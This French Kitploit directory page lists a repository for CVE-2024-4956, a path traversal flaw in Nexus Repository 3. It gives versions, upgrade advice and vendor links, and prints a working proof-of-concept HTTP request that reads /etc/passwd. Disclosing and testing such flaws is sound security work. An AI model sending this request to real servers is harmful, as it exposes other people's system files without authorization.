Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-4956 — Traversée de chemin non authentifiée dans Nexus Repository 3 | Kitploit
Outils/GitHubGitHub/erickfernandox/cve-2024-4956
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHuberickfernandox/cve-2024-4956

CVE-2024-4956

Traversée de chemin non authentifiée dans Nexus Repository 3

Voir le dépôt
3il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-4956 - Traversée de chemin non authentifiée dans Nexus Repository Manager 3

Le Nexus Repository Manager est un gestionnaire de dépôts qui organise, stocke et distribue les artefacts nécessaires au développement.

Une vulnérabilité de traversée de chemin a été découverte dans Nexus Repository 3, dans les versions antérieures à 3.68.1. Cette vulnérabilité permet à un attaquant de créer une URL pour télécharger des fichiers système en dehors du périmètre de l'application Nexus Repository, sans aucune authentification. Cela représente un risque important car cela peut exposer des fichiers système sensibles et potentiellement compromettre la sécurité de l'environnement où Nexus Repository est installé.

Il est recommandé de mettre à jour Nexus Repository vers la version 3.68.1 ou ultérieure dès que possible pour atténuer cette vulnérabilité.

Pour plus d'informations et de détails techniques sur la vulnérabilité, veuillez vous référer au lien suivant :

Références :

  • https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16

Versions vulnérables

La vulnérabilité affecte les versions 3.0 à 3.68.0 de Sonatype Nexus Repository Manager.

Atténuation :

La mise à niveau de Nexus Repository est l'approche recommandée pour éliminer cette vulnérabilité. Cependant, des options d'atténuation immédiates sont disponibles pour les déploiements qui ne peuvent pas être mis à jour immédiatement :

Références :

  • https://support.sonatype.com/hc/en-us/articles/29412417068819

PoC

root@kitploit:~
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

Avec le PoC ci-dessus, il est possible de voir le fichier /etc/passwd être accédé :

Modèle Nuclei

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml

Télécharger l’outil